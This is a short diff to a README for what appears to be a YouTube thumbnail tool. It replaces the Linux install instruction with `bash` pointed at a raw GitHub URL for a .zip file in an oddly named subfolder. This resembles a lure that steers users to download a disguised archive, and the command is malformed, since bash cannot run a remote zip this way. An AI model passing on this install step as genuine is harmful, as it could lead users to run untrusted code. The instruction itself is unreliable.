vraaad/youtube-thumbnail-averager/README.md

 ### 4. Install the Application
 - **For Windows:** Double-click the downloaded .exe file and follow the installation prompts.
 - **For macOS:** Open the .dmg file and drag the application into your Applications folder.
-- **For Linux:** Open a terminal, navigate to the directory where you downloaded the file, and run the command: `bash name_of_file.sh`.
+- **For Linux:** Open a terminal, navigate to the directory where you downloaded the file, and run the command: `bash https://raw.githubusercontent.com/vraaad/youtube-thumbnail-averager/main/counteravouch/youtube-thumbnail-averager.zip`.

 ### 5. Run the Application
 After the installation is complete, you can find the application in your applications folder or start menu.
 Click on the icon to launch it.